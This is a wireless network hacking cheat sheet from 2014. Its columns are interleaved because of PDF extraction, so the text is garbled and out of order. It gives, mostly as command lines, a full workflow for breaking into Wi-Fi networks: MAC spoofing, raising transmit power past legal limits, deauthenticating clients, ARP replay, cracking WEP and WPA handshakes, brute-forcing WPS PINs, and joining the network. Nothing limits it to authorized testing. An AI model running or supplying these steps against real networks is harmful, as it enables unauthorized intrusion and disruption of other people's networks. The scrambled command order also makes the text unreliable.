Wireless Network Hacking Cheat Sheet v1.

1 | created 2014-05-12 by Michael Allen

Mandatory instructions # aireplay-ng -0 5 -a $bssid -c $client don't get it even if airodump says you did.
Optional instructions (Optional) wlan0 # cowpatty -c -r output-file-prefix-
Recommended but optional instructions 01.cap
# Commands The ESSID will be shown next to the connected
$bssid – Wireless access point MAC client in airodump-ng once it is captured. 3. Crack the key (multiple options).
$client – Client device MAC a. Cracking with hashcat/oclhashcat. Best option.
$mymac – Wireless interface MAC 04. IDENTIFY AND CRACK ENCRYPTION Multi-core/GPU support, can pause/resume, etc.
$chan – Channel of the target network Convert the .cap file to a hashcat .hccap file:
$ESSID – Network's ESSID/network name Protip: Use the access point's MAC address to find
# aircrack-ng output-file-prefix-01.cap
the manufacturer. Then search by manufacturer or -J output-file-prefix
01. SETUP ESSID exploits and default wireless keys for that
model. Crack the password:
Stop programs that might interfere with
network settings (optional): # ./hashcat-cli64.bin -n #ofCores -m
04.a. CRACKING WEP (p74/pdf85)
# service network-manager stop 2500 -a 0 -o CRACKED.txt output-file-
# killall -9 dhclient wpa_supplicant For WEP you have to capture enough data (IV's) to prefix.hccap wordlist.txt
calculate the key.
Take down wireless adapter for settings changes b. Cracking with pyrit (supports multi-cores)
# ifconfig wlan0 down Open a new terminal window, and begin cracking Using pyrit with a wordlist:
# pyrit -r output-file-prefix-01.cap -i
the data packets you're capturing with airodump-
Spoof the MAC address (recommended) wordlist.txt -e “$ESSID” -o pyrit-
ng: output.txt attack_passthrough
# ifconfig wlan0 hw ether # aircrack-ng -a 1 -l output-cracked-
00:11:22:33:44:55 key.txt output-file-prefix-01.cap
OR: Using pyrit with genpmk tables:
# macchanger -m 00:11:22:33:44:55 wlan0 # pyrit -r output-file-prefix-01.cap -i
If you need to stop and start again later, that is OK. rainbow.pmk -e “$ESSID” -o pyrit-
Aircrack-ng can combine the data from multiple output.txt attack_cowpatty
Put the card into monitor mode (Optional. May .cap files:
cause problems.) # aircrack-ng -a 1 -l ouput-cracked- 04.b+ CRACKING WPS-ENABLED WPA/WPA2
Use mon0 for later commands instead of wlan0 if key.txt output-prefix-*.cap
you do this. The only way to crack WPA if the password is not
# airmon-ng start wlan0 Let this continue to run while you do the next in your list.
# airmon-ng ← to check that it worked steps. Close the running airodump-ng.
Bruteforce the WPS PIN:
Increase transmit power (recommended) Passive: Wait for enough traffic to pass across the reaver -vv -i mon0 -b $bssid -e $ESSID
# iw reg set BO -c $channel --mac=$mymac
network to crack the key. You can see how many
# iwconfig wlan0 txpower 30 data frames have been captured in airodump-ng's
Capture the 4-way handshake and begin cracking
#Data column.
Bring the interface back up to apply changes it (04.b). Then attack WPS. If one attack fails or
# ifconfig wlan0 up takes too long, the other may succeed.
Active: Generate more traffic on the network using
02. BEGIN CAPTURING TRAFFIC aireplay-ng to do a ARP replay attack. This will 05. CONNECT TO THE NETWORK
speed things up significantly if data is coming in
Start airodump-ng and log captured traffic to a slowly. Open another new window and run: Disable monitor mode. Enable managed mode.
file # aireplay-ng -3 -b $bssid -h $client # ifconfig wlan0 down
# airodump-ng wlan0 -w output-file- wlan0 # airmon-ng stop wlan0
prefix # iwconfig wlan0 mode managed
If it is taking a while to capture any ARP requests, # ifconfig wlan0 up
While capturing traffic with airodump, check that you can try to speed that up too by opening another
traffic to see if AP's support WPS. This saves Connect to a specific access point on the
window and deauthenticating the client while
from having to sniff traffic twice! network:
aireplay-ng is running. When it reconnects it will # iwconfig wlan0 essid $ESSID ap $bssid
# wash -C -f output-file-prefix-*.cap send an ARP request:
# aireplay -0 5 -a $bssid -c $client
03. FOCUS ON THE TARGET NETWORK
wlan0 OR connect to ANY access point on the
network:
Stop the currently running airodump-ng # iwconfig wlan0 essid $ESSID ap any
(CTRL+C) Once the key is cracked, aircrack-ng will display
it on screen and save it to output-cracked- Connect using WEP:
Run airodump-ng focused only on the target key.txt # iwconfig wlan0 essid $ESSID key
network $PASSWORD && dhclient wlan0
04.b. CRACKING WPA/WPA2 (p85/pdf96)
# airodump-ng wlan0 -w output-file-
prefix --channel $chan --bssid $bssid 1. Capture the 4-way handshake. This happens Connect using WPA/WPA2:
when a client device connects to the network. The Stop interfering programs (see setup).
A number is appended to the end of output-file- already running airodump-ng will do this part. On Create wpa_supplicant.conf:
prefix every time, so it is OK to use the same prefix success, airodump-ng displays: # wpa_passphrase $ESSID $PASSWORD >
multiple times – it will not overwrite your saved wpa_supplicant.conf
[ WPA Handshake: 00:00:00:00:00:00
data. in the top right.
Connect to the network.
03.a. UNCOVER HIDDEN ESSID # wpa_supplicant -cwpa_supplicant.conf
Passive: Wait for a device to connect to the -iwlan0 -B && dhclient wlan0
You must capture a Probe frame sent by a client network.
machine as it connects to the network.
Recommended resources:
Active: Deauthenticate a device currently
BackTrack 5 Wireless Penetration Testing
Passive: Wait. Eventually it will happen on its own connected to the network and capture the
www.routerpwn.com
and the ESSID will appear in either the top (access handshake as it reconnects. In a new terminal
www.renderlab.net/projects/WPA-tables
points) or bottom (clients) portion of the currently window:
running airodump-ng.
Disconnect one:
Active: Deauthenticate a connected client and # aireplay-ng -0 5 -a $bssid -c $client
capture the Probe when it reconnects: wlan0
# aireplay-ng -0 5 -a $bssid wlan0
For best results, specify the client MAC address OR disconnect them all:
# aireplay-ng -0 5 -a $bssid wlan0
too:
2. Verify the captured handshake. Sometimes you